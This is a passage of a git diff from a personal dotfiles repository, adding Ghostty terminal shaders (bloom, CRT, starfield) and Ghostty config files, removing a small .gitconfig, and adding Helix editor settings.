const vec3[24] samples = {
|
||||||
|
vec3(0.1693761725038636, 0.9855514761735895, 1),
|
||||||
|
vec3(-1.333070830962943, 0.4721463328627773, 0.7071067811865475),
|
||||||
|
vec3(-0.8464394909806497, -1.51113870578065, 0.5773502691896258),
|
||||||
|
vec3(1.554155680728463, -1.2588090085709776, 0.5),
|
||||||
|
vec3(1.681364377589461, 1.4741145918052656, 0.4472135954999579),
|
||||||
|
vec3(-1.2795157692199817, 2.088741103228784, 0.4082482904638631),
|
||||||
|
vec3(-2.4575847530631187, -0.9799373355024756, 0.3779644730092272),
|
||||||
|
vec3(0.5874641440200847, -2.7667464429345077, 0.35355339059327373),
|
||||||
|
vec3(2.997715703369726, 0.11704939884745152, 0.3333333333333333),
|
||||||
|
vec3(0.41360842451688395, 3.1351121305574803, 0.31622776601683794),
|
||||||
|
vec3(-3.167149933769243, 0.9844599011770256, 0.30151134457776363),
|
||||||
|
vec3(-1.5736713846521535, -3.0860263079123245, 0.2886751345948129),
|
||||||
|
vec3(2.888202648340422, -2.1583061557896213, 0.2773500981126146),
|
||||||
|
vec3(2.7150778983300325, 2.5745586041105715, 0.2672612419124244),
|
||||||
|
vec3(-2.1504069972377464, 3.2211410627650165, 0.2581988897471611),
|
||||||
|
vec3(-3.6548858794907493, -1.6253643308191343, 0.25),
|
||||||
|
vec3(1.0130775986052671, -3.9967078676335834, 0.24253562503633297),
|
||||||
|
vec3(4.229723673607257, 0.33081361055181563, 0.23570226039551587),
|
||||||
|
vec3(0.40107790291173834, 4.340407413572593, 0.22941573387056174),
|
||||||
|
vec3(-4.319124570236028, 1.159811599693438, 0.22360679774997896),
|
||||||
|
vec3(-1.9209044802827355, -4.160543952132907, 0.2182178902359924),
|
||||||
|
vec3(3.8639122286635708, -2.6589814382925123, 0.21320071635561041),
|
||||||
|
vec3(3.3486228404946234, 3.4331800232609, 0.20851441405707477),
|
||||||
|
vec3(-2.8769733643574344, 3.9652268864187157, 0.20412414523193154)
|
||||||
|
};
|
||||||
|
|
||||||
|
float lum(vec4 c) {
|
||||||
|
return 0.299 * c.r + 0.587 * c.g + 0.114 * c.b;
|
||||||
|
}
|
||||||
|
|
||||||
|
void mainImage(out vec4 fragColor, in vec2 fragCoord) {
|
||||||
|
vec2 uv = fragCoord.xy / iResolution.xy;
|
||||||
|
|
||||||
|
vec4 color = texture(iChannel0, uv);
|
||||||
|
|
||||||
|
vec2 step = vec2(1.414) / iResolution.xy;
|
||||||
|
|
||||||
|
for (int i = 0; i < 24; i++) {
|
||||||
|
vec3 s = samples[i];
|
||||||
|
vec4 c = texture(iChannel0, uv + s.xy * step);
|
||||||
|
float l = lum(c);
|
||||||
|
if (l > 0.2 && lum(color) < 0.75) {
|
||||||
|
color += l * s.z * c * 0.12; // reduced from 0.2 to balance glow intensity
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
fragColor = clamp(color, 0.0, 1.12); // smooth highlighting
|
||||||
|
}
|
||||||
69
ghostty/.config/ghostty/config
Normal file
69
ghostty/.config/ghostty/config
Normal file
|
|
@ -0,0 +1,69 @@
|
||||||
|
# This is the configuration file for Ghostty.
|
||||||
|
#
|
||||||
|
# This template file has been automatically created at the following
|
||||||
|
# path since Ghostty couldn't find any existing config files on your system:
|
||||||
|
#
|
||||||
|
# /home/e/.config/ghostty/config
|
||||||
|
#
|
||||||
|
# The template does not set any default options, since Ghostty ships
|
||||||
|
# with sensible defaults for all options. Users should only need to set
|
||||||
|
# options that they want to change from the default.
|
||||||
|
#
|
||||||
|
# Run `ghostty +show-config --default --docs` to view a list of
|
||||||
|
# all available config options and their default values.
|
||||||
|
#
|
||||||
|
# Additionally, each config option is also explained in detail
|
||||||
|
# on Ghostty's website, at https://ghostty.org/docs/config.
|
||||||
|
|
||||||
|
# Config syntax crash course
|
||||||
|
# ==========================
|
||||||
|
# # The config file consists of simple key-value pairs,
|
||||||
|
# # separated by equals signs.
|
||||||
|
# font-family = Iosevka
|
||||||
|
# window-padding-x = 2
|
||||||
|
#
|
||||||
|
# # Spacing around the equals sign does not matter.
|
||||||
|
# # All of these are identical:
|
||||||
|
# key=value
|
||||||
|
# key= value
|
||||||
|
# key =value
|
||||||
|
# key = value
|
||||||
|
#
|
||||||
|
# # Any line beginning with a # is a comment. It's not possible to put
|
||||||
|
# # a comment after a config option, since it would be interpreted as a
|
||||||
|
# # part of the value. For example, this will have a value of "#123abc":
|
||||||
|
# background = #123abc
|
||||||
|
#
|
||||||
|
# # Empty values are used to reset config keys to default.
|
||||||
|
# key =
|
||||||
|
#
|
||||||
|
# # Some config options have unique syntaxes for their value,
|
||||||
|
# # which is explained in the docs for that config option.
|
||||||
|
# # Just for example:
|
||||||
|
# resize-overlay-duration = 4s 200ms
|
||||||
|
|
||||||
|
background-opacity = .95
|
||||||
|
background-blur = 15
|
||||||
|
|
||||||
|
keybind = global:ctrl+grave_accent=toggle_quick_terminal
|
||||||
|
|
||||||
|
custom-shader = ~/.config/ghostty/bloom.glsl
|
||||||
|
#custom-shader = ~/.config/ghostty/crt.glsl
|
||||||
|
#custom-shader = ~/.config/ghostty/starfield.glsl
|
||||||
|
|
||||||
|
#custom-shader = ~/.config/ghostty/ghostty-shaders/bloom.glsl
|
||||||
|
#custom-shader = ~/.config/ghostty/ghostty-shaders/galaxy.glsl
|
||||||
|
#custom-shader = ~/.config/ghostty/ghostty-shaders/glitchy.glsl
|
||||||
|
#custom-shader = ~/.config/ghostty/ghostty-shaders/glow-rgbsplit-twitchy.glsl
|
||||||
|
#custom-shader = ~/.config/ghostty/ghostty-shaders/in-game-crt.glsl
|
||||||
|
#custom-shader = ~/.config/ghostty/ghostty-shaders/matrix-hallway.glsl
|
||||||
|
#custom-shader = ~/.config/ghostty/ghostty-shaders/negative.glsl
|
||||||
|
#custom-shader = ~/.config/ghostty/ghostty-shaders/sparks-from-fire.glsl
|
||||||
|
#custom-shader = ~/.config/ghostty/ghostty-shaders/starfield-colors.glsl
|
||||||
|
#custom-shader = ~/.config/ghostty/ghostty-shaders/starfield.glsl
|
||||||
|
|
||||||
|
|
||||||
|
keybind = shift+enter=text:\x1b\r
|
||||||
|
|
||||||
|
# Use zsh as default shell
|
||||||
|
command = /usr/bin/zsh
|
||||||
50
ghostty/.config/ghostty/config.default
Normal file
50
ghostty/.config/ghostty/config.default
Normal file
|
|
@ -0,0 +1,50 @@
|
||||||
|
# Fonts
|
||||||
|
font-family = "Fira Code"
|
||||||
|
font-family-bold = "Fira Code"
|
||||||
|
font-family-italic = "Maple Mono"
|
||||||
|
font-family-bold-italic = "Maple Mono"
|
||||||
|
font-family = "Symbols Nerd Font Mono"
|
||||||
|
font-size = 10
|
||||||
|
adjust-underline-position = 4
|
||||||
|
|
||||||
|
# Mouse
|
||||||
|
mouse-hide-while-typing = true
|
||||||
|
# mouse-scroll-multiplier = 1
|
||||||
|
|
||||||
|
# Theme
|
||||||
|
# theme = /home/folke/projects/tokyonight.nvim/extras/ghostty/tokyonight_night
|
||||||
|
cursor-invert-fg-bg = true
|
||||||
|
background-opacity = 0.9
|
||||||
|
window-theme = ghostty
|
||||||
|
|
||||||
|
# keybindings
|
||||||
|
keybind = clear
|
||||||
|
keybind = ctrl+shift+h=goto_split:left
|
||||||
|
keybind = ctrl+shift+j=goto_split:bottom
|
||||||
|
keybind = ctrl+shift+k=goto_split:top
|
||||||
|
keybind = ctrl+shift+l=goto_split:right
|
||||||
|
keybind = super+shift+t=new_tab
|
||||||
|
keybind = super+shift+h=previous_tab
|
||||||
|
keybind = super+shift+l=next_tab
|
||||||
|
keybind = super+shift+comma=move_tab:-1
|
||||||
|
keybind = super+shift+period=move_tab:1
|
||||||
|
keybind = super+shift+c=copy_to_clipboard
|
||||||
|
keybind = super+shift+v=paste_from_clipboard
|
||||||
|
keybind = super+shift+enter=new_split:auto
|
||||||
|
keybind = super+shift+i=inspector:toggle
|
||||||
|
keybind = super+shift+m=toggle_split_zoom
|
||||||
|
keybind = super+shift+r=reload_config
|
||||||
|
keybind = super+shift+s=write_screen_file:open
|
||||||
|
keybind = super+shift+w=close_surface
|
||||||
|
|
||||||
|
# Window
|
||||||
|
gtk-single-instance = true
|
||||||
|
gtk-tabs-location = bottom
|
||||||
|
gtk-wide-tabs = false
|
||||||
|
window-padding-y = 2,0
|
||||||
|
window-padding-balance = true
|
||||||
|
window-decoration = true
|
||||||
|
|
||||||
|
# Other
|
||||||
|
copy-on-select = clipboard
|
||||||
|
shell-integration-features = cursor,sudo,no-title
|
||||||
310
ghostty/.config/ghostty/crt.glsl
Normal file
310
ghostty/.config/ghostty/crt.glsl
Normal file
|
|
@ -0,0 +1,310 @@
|
||||||
|
// source: https://gist.github.com/qwerasd205/c3da6c610c8ffe17d6d2d3cc7068f17f
|
||||||
|
// credits: https://github.com/qwerasd205
|
||||||
|
//==============================================================
|
||||||
|
//
|
||||||
|
// [CRTS] PUBLIC DOMAIN CRT-STYLED SCALAR by Timothy Lottes
|
||||||
|
//
|
||||||
|
// [+] Adapted with alterations for use in Ghostty by Qwerasd.
|
||||||
|
// For more information on changes, see comment below license.
|
||||||
|
//
|
||||||
|
//==============================================================
|
||||||
|
//
|
||||||
|
// LICENSE = UNLICENSE (aka PUBLIC DOMAIN)
|
||||||
|
//
|
||||||
|
//--------------------------------------------------------------
|
||||||
|
// This is free and unencumbered software released into the
|
||||||
|
// public domain.
|
||||||
|
//--------------------------------------------------------------
|
||||||
|
// Anyone is free to copy, modify, publish, use, compile, sell,
|
||||||
|
// or distribute this software, either in source code form or as
|
||||||
|
// a compiled binary, for any purpose, commercial or
|
||||||
|
// non-commercial, and by any means.
|
||||||
|
//--------------------------------------------------------------
|
||||||
|
// In jurisdictions that recognize copyright laws, the author or
|
||||||
|
// authors of this software dedicate any and all copyright
|
||||||
|
// interest in the software to the public domain. We make this
|
||||||
|
// dedication for the benefit of the public at large and to the
|
||||||
|
// detriment of our heirs and successors. We intend this
|
||||||
|
// dedication to be an overt act of relinquishment in perpetuity
|
||||||
|
// of all present and future rights to this software under
|
||||||
|
// copyright law.
|
||||||
|
//--------------------------------------------------------------
|
||||||
|
// THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
|
||||||
|
// KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
|
||||||
|
// WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR
|
||||||
|
// PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS BE
|
||||||
|
// LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN
|
||||||
|
// AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT
|
||||||
|
// OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
|
||||||
|
// DEALINGS IN THE SOFTWARE.
|
||||||
|
//--------------------------------------------------------------
|
||||||
|
// For more information, please refer to
|
||||||
|
// <http://unlicense.org/>
|
||||||
|
//==============================================================
|
||||||
|
|
||||||
|
// This shader is a modified version of the excellent
|
||||||
|
// FixingPixelArtFast by Timothy Lottes on Shadertoy.
|
||||||
|
//
|
||||||
|
// The original shader can be found at:
|
||||||
|
// https://www.shadertoy.com/view/MtSfRK
|
||||||
|
//
|
||||||
|
// Modifications have been made to reduce the verbosity,
|
||||||
|
// and many of the comments have been removed / reworded.
|
||||||
|
// Additionally, the license has been moved to the top of
|
||||||
|
// the file, and can be read above. I (Qwerasd) choose to
|
||||||
|
// release the modified version under the same license.
|
||||||
|
|
||||||
|
// The appearance of this shader can be altered
|
||||||
|
// by adjusting the parameters defined below.
|
||||||
|
|
||||||
|
// "Scanlines" per real screen pixel.
|
||||||
|
// e.g. SCALE 0.5 means each scanline is 2 pixels.
|
||||||
|
// Recommended values:
|
||||||
|
// o High DPI displays: 0.33333333
|
||||||
|
// - Low DPI displays: 0.66666666
|
||||||
|
#define SCALE 0.33333333
|
||||||
|
|
||||||
|
// "Tube" warp
|
||||||
|
#define CRTS_WARP 1
|
||||||
|
|
||||||
|
// Darkness of vignette in corners after warping
|
||||||
|
// 0.0 = completely black
|
||||||
|
// 1.0 = no vignetting
|
||||||
|
#define MIN_VIN 0.5
|
||||||
|
|
||||||
|
// Try different masks
|
||||||
|
// #define CRTS_MASK_GRILLE 1
|
||||||
|
// #define CRTS_MASK_GRILLE_LITE 1
|
||||||
|
// #define CRTS_MASK_NONE 1
|
||||||
|
#define CRTS_MASK_SHADOW 1
|
||||||
|
|
||||||
|
// Scanline thinness
|
||||||
|
// 0.50 = fused scanlines
|
||||||
|
// 0.70 = recommended default
|
||||||
|
// 1.00 = thinner scanlines (too thin)
|
||||||
|
#define INPUT_THIN 0.75
|
||||||
|
|
||||||
|
// Horizonal scan blur
|
||||||
|
// -3.0 = pixely
|
||||||
|
// -2.5 = default
|
||||||
|
// -2.0 = smooth
|
||||||
|
// -1.0 = too blurry
|
||||||
|
#define INPUT_BLUR -2.75
|
||||||
|
|
||||||
|
// Shadow mask effect, ranges from,
|
||||||
|
// 0.25 = large amount of mask (not recommended, too dark)
|
||||||
|
// 0.50 = recommended default
|
||||||
|
// 1.00 = no shadow mask
|
||||||
|
#define INPUT_MASK 0.65
|
||||||
|
|
||||||
|
float FromSrgb1(float c) {
|
||||||
|
return (c <= 0.04045) ? c * (1.0 / 12.92) :
|
||||||
|
pow(c * (1.0 / 1.055) + (0.055 / 1.055), 2.4);
|
||||||
|
}
|
||||||
|
vec3 FromSrgb(vec3 c) {
|
||||||
|
return vec3(
|
||||||
|
FromSrgb1(c.r), FromSrgb1(c.g), FromSrgb1(c.b));
|
||||||
|
}
|
||||||
|
|
||||||
|
vec3 CrtsFetch(vec2 uv) {
|
||||||
|
return FromSrgb(texture(iChannel0, uv.xy).rgb);
|
||||||
|
}
|
||||||
|
|
||||||
|
#define CrtsRcpF1(x) (1.0/(x))
|
||||||
|
#define CrtsSatF1(x) clamp((x),0.0,1.0)
|
||||||
|
|
||||||
|
float CrtsMax3F1(float a, float b, float c) {
|
||||||
|
return max(a, max(b, c));
|
||||||
|
}
|
||||||
|
|
||||||
|
vec2 CrtsTone(
|
||||||
|
float thin,
|
||||||
|
float mask) {
|
||||||
|
#ifdef CRTS_MASK_NONE
|
||||||
|
mask = 1.0;
|
||||||
|
#endif
|
||||||
|
|
||||||
|
#ifdef CRTS_MASK_GRILLE_LITE
|
||||||
|
// Normal R mask is {1.0,mask,mask}
|
||||||
|
// LITE R mask is {mask,1.0,1.0}
|
||||||
|
mask = 0.5 + mask * 0.5;
|
||||||
|
#endif
|
||||||
|
|
||||||
|
vec2 ret;
|
||||||
|
float midOut = 0.18 / ((1.5 - thin) * (0.5 * mask + 0.5));
|
||||||
|
float pMidIn = 0.18;
|
||||||
|
ret.x = ((-pMidIn) + midOut) / ((1.0 - pMidIn) * midOut);
|
||||||
|
ret.y = ((-pMidIn) * midOut + pMidIn) / (midOut * (-pMidIn) + midOut);
|
||||||
|
|
||||||
|
return ret;
|
||||||
|
}
|
||||||
|
|
||||||
|
vec3 CrtsMask(vec2 pos, float dark) {
|
||||||
|
#ifdef CRTS_MASK_GRILLE
|
||||||
|
vec3 m = vec3(dark, dark, dark);
|
||||||
|
float x = fract(pos.x * (1.0 / 3.0));
|
||||||
|
if (x < (1.0 / 3.0)) m.r = 1.0;
|
||||||
|
else if (x < (2.0 / 3.0)) m.g = 1.0;
|
||||||
|
else m.b = 1.0;
|
||||||
|
return m;
|
||||||
|
#endif
|
||||||
|
|
||||||
|
#ifdef CRTS_MASK_GRILLE_LITE
|
||||||
|
vec3 m = vec3(1.0, 1.0, 1.0);
|
||||||
|
float x = fract(pos.x * (1.0 / 3.0));
|
||||||
|
if (x < (1.0 / 3.0)) m.r = dark;
|
||||||
|
else if (x < (2.0 / 3.0)) m.g = dark;
|
||||||
|
else m.b = dark;
|
||||||
|
return m;
|
||||||
|
#endif
|
||||||
|
|
||||||
|
#ifdef CRTS_MASK_NONE
|
||||||
|
return vec3(1.0, 1.0, 1.0);
|
||||||
|
#endif
|
||||||
|
|
||||||
|
#ifdef CRTS_MASK_SHADOW
|
||||||
|
pos.x += pos.y * 3.0;
|
||||||
|
vec3 m = vec3(dark, dark, dark);
|
||||||
|
float x = fract(pos.x * (1.0 / 6.0));
|
||||||
|
if (x < (1.0 / 3.0)) m.r = 1.0;
|
||||||
|
else if (x < (2.0 / 3.0)) m.g = 1.0;
|
||||||
|
else m.b = 1.0;
|
||||||
|
return m;
|
||||||
|
#endif
|
||||||
|
}
|
||||||
|
|
||||||
|
vec3 CrtsFilter(
|
||||||
|
vec2 ipos,
|
||||||
|
vec2 inputSizeDivOutputSize,
|
||||||
|
vec2 halfInputSize,
|
||||||
|
vec2 rcpInputSize,
|
||||||
|
vec2 rcpOutputSize,
|
||||||
|
vec2 twoDivOutputSize,
|
||||||
|
float inputHeight,
|
||||||
|
vec2 warp,
|
||||||
|
float thin,
|
||||||
|
float blur,
|
||||||
|
float mask,
|
||||||
|
vec2 tone
|
||||||
|
) {
|
||||||
|
// Optional apply warp
|
||||||
|
vec2 pos;
|
||||||
|
#ifdef CRTS_WARP
|
||||||
|
// Convert to {-1 to 1} range
|
||||||
|
pos = ipos * twoDivOutputSize - vec2(1.0, 1.0);
|
||||||
|
|
||||||
|
// Distort pushes image outside {-1 to 1} range
|
||||||
|
pos *= vec2(
|
||||||
|
1.0 + (pos.y * pos.y) * warp.x,
|
||||||
|
1.0 + (pos.x * pos.x) * warp.y);
|
||||||
|
|
||||||
|
// TODO: Vignette needs optimization
|
||||||
|
float vin = 1.0 - (
|
||||||
|
(1.0 - CrtsSatF1(pos.x * pos.x)) * (1.0 - CrtsSatF1(pos.y * pos.y)));
|
||||||
|
vin = CrtsSatF1((-vin) * inputHeight + inputHeight);
|
||||||
|
|
||||||
|
// Leave in {0 to inputSize}
|
||||||
|
pos = pos * halfInputSize + halfInputSize;
|
||||||
|
#else
|
||||||
|
pos = ipos * inputSizeDivOutputSize;
|
||||||
|
#endif
|
||||||
|
|
||||||
|
// Snap to center of first scanline
|
||||||
|
float y0 = floor(pos.y - 0.5) + 0.5;
|
||||||
|
// Snap to center of one of four pixels
|
||||||
|
float x0 = floor(pos.x - 1.5) + 0.5;
|
||||||
|
|
||||||
|
// Inital UV position
|
||||||
|
vec2 p = vec2(x0 * rcpInputSize.x, y0 * rcpInputSize.y);
|
||||||
|
// Fetch 4 nearest texels from 2 nearest scanlines
|
||||||
|
vec3 colA0 = CrtsFetch(p);
|
||||||
|
p.x += rcpInputSize.x;
|
||||||
|
vec3 colA1 = CrtsFetch(p);
|
||||||
|
p.x += rcpInputSize.x;
|
||||||
|
vec3 colA2 = CrtsFetch(p);
|
||||||
|
p.x += rcpInputSize.x;
|
||||||
|
vec3 colA3 = CrtsFetch(p);
|
||||||
|
p.y += rcpInputSize.y;
|
||||||
|
vec3 colB3 = CrtsFetch(p);
|
||||||
|
p.x -= rcpInputSize.x;
|
||||||
|
vec3 colB2 = CrtsFetch(p);
|
||||||
|
p.x -= rcpInputSize.x;
|
||||||
|
vec3 colB1 = CrtsFetch(p);
|
||||||
|
p.x -= rcpInputSize.x;
|
||||||
|
vec3 colB0 = CrtsFetch(p);
|
||||||
|
|
||||||
|
// Vertical filter
|
||||||
|
// Scanline intensity is using sine wave
|
||||||
|
// Easy filter window and integral used later in exposure
|
||||||
|
float off = pos.y - y0;
|
||||||
|
float pi2 = 6.28318530717958;
|
||||||
|
float hlf = 0.5;
|
||||||
|
float scanA = cos(min(0.5, off * thin) * pi2) * hlf + hlf;
|
||||||
|
float scanB = cos(min(0.5, (-off) * thin + thin) * pi2) * hlf + hlf;
|
||||||
|
|
||||||
|
// Horizontal kernel is simple gaussian filter
|
||||||
|
float off0 = pos.x - x0;
|
||||||
|
float off1 = off0 - 1.0;
|
||||||
|
float off2 = off0 - 2.0;
|
||||||
|
float off3 = off0 - 3.0;
|
||||||
|
float pix0 = exp2(blur * off0 * off0);
|
||||||
|
float pix1 = exp2(blur * off1 * off1);
|
||||||
|
float pix2 = exp2(blur * off2 * off2);
|
||||||
|
float pix3 = exp2(blur * off3 * off3);
|
||||||
|
float pixT = CrtsRcpF1(pix0 + pix1 + pix2 + pix3);
|
||||||
|
|
||||||
|
#ifdef CRTS_WARP
|
||||||
|
// Get rid of wrong pixels on edge
|
||||||
|
pixT *= max(MIN_VIN, vin);
|
||||||
|
#endif
|
||||||
|
|
||||||
|
scanA *= pixT;
|
||||||
|
scanB *= pixT;
|
||||||
|
|
||||||
|
// Apply horizontal and vertical filters
|
||||||
|
vec3 color =
|
||||||
|
(colA0 * pix0 + colA1 * pix1 + colA2 * pix2 + colA3 * pix3) * scanA +
|
||||||
|
(colB0 * pix0 + colB1 * pix1 + colB2 * pix2 + colB3 * pix3) * scanB;
|
||||||
|
|
||||||
|
// Apply phosphor mask
|
||||||
|
color *= CrtsMask(ipos, mask);
|
||||||
|
|
||||||
|
// Tonal control, start by protecting from /0
|
||||||
|
float peak = max(1.0 / (256.0 * 65536.0),
|
||||||
|
CrtsMax3F1(color.r, color.g, color.b));
|
||||||
|
// Compute the ratios of {R,G,B}
|
||||||
|
vec3 ratio = color * CrtsRcpF1(peak);
|
||||||
|
// Apply tonal curve to peak value
|
||||||
|
peak = peak * CrtsRcpF1(peak * tone.x + tone.y);
|
||||||
|
// Reconstruct color
|
||||||
|
return ratio * peak;
|
||||||
|
}
|
||||||
|
|
||||||
|
float ToSrgb1(float c) {
|
||||||
|
return (c < 0.0031308 ? c * 12.92 : 1.055 * pow(c, 0.41666) - 0.055);
|
||||||
|
}
|
||||||
|
vec3 ToSrgb(vec3 c) {
|
||||||
|
return vec3(
|
||||||
|
ToSrgb1(c.r), ToSrgb1(c.g), ToSrgb1(c.b));
|
||||||
|
}
|
||||||
|
|
||||||
|
void mainImage(out vec4 fragColor, in vec2 fragCoord) {
|
||||||
|
float aspect = iResolution.x / iResolution.y;
|
||||||
|
fragColor.rgb = CrtsFilter(
|
||||||
|
fragCoord.xy,
|
||||||
|
vec2(1.0),
|
||||||
|
iResolution.xy * SCALE * 0.5,
|
||||||
|
1.0 / (iResolution.xy * SCALE),
|
||||||
|
1.0 / iResolution.xy,
|
||||||
|
2.0 / iResolution.xy,
|
||||||
|
iResolution.y,
|
||||||
|
vec2(1.0 / (50.0 * aspect), 1.0 / 50.0),
|
||||||
|
INPUT_THIN,
|
||||||
|
INPUT_BLUR,
|
||||||
|
INPUT_MASK,
|
||||||
|
CrtsTone(INPUT_THIN, INPUT_MASK)
|
||||||
|
);
|
||||||
|
|
||||||
|
// Linear to SRGB for output.
|
||||||
|
fragColor.rgb = ToSrgb(fragColor.rgb);
|
||||||
|
}
|
||||||
1
ghostty/.config/ghostty/ghostty-shaders
Submodule
1
ghostty/.config/ghostty/ghostty-shaders
Submodule
|
|
@ -0,0 +1 @@
|
||||||
|
Subproject commit a17573fb254e618f92a75afe80faa31fd5e09d6f
|
||||||
135
ghostty/.config/ghostty/starfield.glsl
Normal file
135
ghostty/.config/ghostty/starfield.glsl
Normal file
|
|
@ -0,0 +1,135 @@
|
||||||
|
// transparent background
|
||||||
|
const bool transparent = false;
|
||||||
|
|
||||||
|
// terminal contents luminance threshold to be considered background (0.0 to 1.0)
|
||||||
|
const float threshold = 0.15;
|
||||||
|
|
||||||
|
// divisions of grid
|
||||||
|
const float repeats = 30.;
|
||||||
|
|
||||||
|
// number of layers
|
||||||
|
const float layers = 21.;
|
||||||
|
|
||||||
|
// star colors
|
||||||
|
const vec3 white = vec3(1.0); // Set star color to pure white
|
||||||
|
|
||||||
|
float luminance(vec3 color) {
|
||||||
|
return dot(color, vec3(0.2126, 0.7152, 0.0722));
|
||||||
|
}
|
||||||
|
|
||||||
|
float N21(vec2 p) {
|
||||||
|
p = fract(p * vec2(233.34, 851.73));
|
||||||
|
p += dot(p, p + 23.45);
|
||||||
|
return fract(p.x * p.y);
|
||||||
|
}
|
||||||
|
|
||||||
|
vec2 N22(vec2 p) {
|
||||||
|
float n = N21(p);
|
||||||
|
return vec2(n, N21(p + n));
|
||||||
|
}
|
||||||
|
|
||||||
|
mat2 scale(vec2 _scale) {
|
||||||
|
return mat2(_scale.x, 0.0,
|
||||||
|
0.0, _scale.y);
|
||||||
|
}
|
||||||
|
|
||||||
|
// 2D Noise based on Morgan McGuire
|
||||||
|
float noise(in vec2 st) {
|
||||||
|
vec2 i = floor(st);
|
||||||
|
vec2 f = fract(st);
|
||||||
|
|
||||||
|
// Four corners in 2D of a tile
|
||||||
|
float a = N21(i);
|
||||||
|
float b = N21(i + vec2(1.0, 0.0));
|
||||||
|
float c = N21(i + vec2(0.0, 1.0));
|
||||||
|
float d = N21(i + vec2(1.0, 1.0));
|
||||||
|
|
||||||
|
// Smooth Interpolation
|
||||||
|
vec2 u = f * f * (3.0 - 2.0 * f); // Cubic Hermite Curve
|
||||||
|
|
||||||
|
// Mix 4 corners percentages
|
||||||
|
return mix(a, b, u.x) +
|
||||||
|
(c - a) * u.y * (1.0 - u.x) +
|
||||||
|
(d - b) * u.x * u.y;
|
||||||
|
}
|
||||||
|
|
||||||
|
float perlin2(vec2 uv, int octaves, float pscale) {
|
||||||
|
float col = 1.;
|
||||||
|
float initScale = 4.;
|
||||||
|
for (int l; l < octaves; l++) {
|
||||||
|
float val = noise(uv * initScale);
|
||||||
|
if (col <= 0.01) {
|
||||||
|
col = 0.;
|
||||||
|
break;
|
||||||
|
}
|
||||||
|
val -= 0.01;
|
||||||
|
val *= 0.5;
|
||||||
|
col *= val;
|
||||||
|
initScale *= pscale;
|
||||||
|
}
|
||||||
|
return col;
|
||||||
|
}
|
||||||
|
|
||||||
|
vec3 stars(vec2 uv, float offset) {
|
||||||
|
float timeScale = -(iTime + offset) / layers;
|
||||||
|
float trans = fract(timeScale);
|
||||||
|
float newRnd = floor(timeScale);
|
||||||
|
vec3 col = vec3(0.);
|
||||||
|
|
||||||
|
// Translate uv then scale for center
|
||||||
|
uv -= vec2(0.5);
|
||||||
|
uv = scale(vec2(trans)) * uv;
|
||||||
|
uv += vec2(0.5);
|
||||||
|
|
||||||
|
// Create square aspect ratio
|
||||||
|
uv.x *= iResolution.x / iResolution.y;
|
||||||
|
|
||||||
|
// Create boxes
|
||||||
|
uv *= repeats;
|
||||||
|
|
||||||
|
// Get position
|
||||||
|
vec2 ipos = floor(uv);
|
||||||
|
|
||||||
|
// Return uv as 0 to 1
|
||||||
|
uv = fract(uv);
|
||||||
|
|
||||||
|
// Calculate random xy and size
|
||||||
|
vec2 rndXY = N22(newRnd + ipos * (offset + 1.)) * 0.9 + 0.05;
|
||||||
|
float rndSize = N21(ipos) * 100. + 200.;
|
||||||
|
|
||||||
|
vec2 j = (rndXY - uv) * rndSize;
|
||||||
|
float sparkle = 1. / dot(j, j);
|
||||||
|
|
||||||
|
// Set stars to be pure white
|
||||||
|
col += white * sparkle;
|
||||||
|
|
||||||
|
col *= smoothstep(1., 0.8, trans);
|
||||||
|
return col; // Return pure white stars only
|
||||||
|
}
|
||||||
|
|
||||||
|
void mainImage(out vec4 fragColor, in vec2 fragCoord)
|
||||||
|
{
|
||||||
|
// Normalized pixel coordinates (from 0 to 1)
|
||||||
|
vec2 uv = fragCoord / iResolution.xy;
|
||||||
|
|
||||||
|
vec3 col = vec3(0.);
|
||||||
|
|
||||||
|
for (float i = 0.; i < layers; i++) {
|
||||||
|
col += stars(uv, i);
|
||||||
|
}
|
||||||
|
|
||||||
|
// Sample the terminal screen texture including alpha channel
|
||||||
|
vec4 terminalColor = texture(iChannel0, uv);
|
||||||
|
|
||||||
|
if (transparent) {
|
||||||
|
col += terminalColor.rgb;
|
||||||
|
}
|
||||||
|
|
||||||
|
// Make a mask that is 1.0 where the terminal content is not black
|
||||||
|
float mask = 1 - step(threshold, luminance(terminalColor.rgb));
|
||||||
|
|
||||||
|
vec3 blendedColor = mix(terminalColor.rgb, col, mask);
|
||||||
|
|
||||||
|
// Apply terminal's alpha to control overall opacity
|
||||||
|
fragColor = vec4(blendedColor, terminalColor.a);
|
||||||
|
}
|
||||||
|
|
@ -1,8 +0,0 @@
|
||||||
[user]
|
|
||||||
name = rpriven
|
|
||||||
email = rob.pratt@tutanota.com
|
|
||||||
[init]
|
|
||||||
defaultBranch = main
|
|
||||||
|
|
||||||
[core]
|
|
||||||
editor = nvim
|
|
||||||
20
helix/.config/helix/config.toml
Normal file
20
helix/.config/helix/config.toml
Normal file
|
|
@ -0,0 +1,20 @@
|
||||||
|
theme = "doom_acario_dark"
|
||||||
|
# theme = "tokyonight_storm"
|
||||||
|
|
||||||
|
[editor]
|
||||||
|
line-number = "relative"
|
||||||
|
mouse = false
|
||||||
|
bufferline = "multiple"
|
||||||
|
gutters = ["diagnostics", "spacer", "line-numbers", "spacer", "diff"]
|
||||||
|
|
||||||
|
[editor.cursor-shape]
|
||||||
|
insert = "bar"
|
||||||
|
normal = "block"
|
||||||
|
select = "underline"
|
||||||
|
|
||||||
|
[editor.file-picker]
|
||||||
|
hidden = false
|
||||||
|
|
||||||
|
[keys.normal]
|
||||||
|
esc = ["collapse_selection", "keep_primary_selection"]
|
||||||
|
|
||||||
66
helix/.config/helix/languages.toml
Normal file
66
helix/.config/helix/languages.toml
Normal file
|
|
@ -0,0 +1,66 @@
|
||||||
|
# ~/.config/helix/languages.toml
|
||||||
|
|
||||||
|
[[language]]
|
||||||
|
name = "python"
|
||||||
|
language-servers = ["pylsp"]
|
||||||
|
auto-format = true
|
||||||
|
|
||||||
|
[language-server.pylsp.config.pylsp.plugins.pycodestyle]
|
||||||
|
maxLineLength = 100
|
||||||
|
|
||||||
|
[[language]]
|
||||||
|
name = "bash"
|
||||||
|
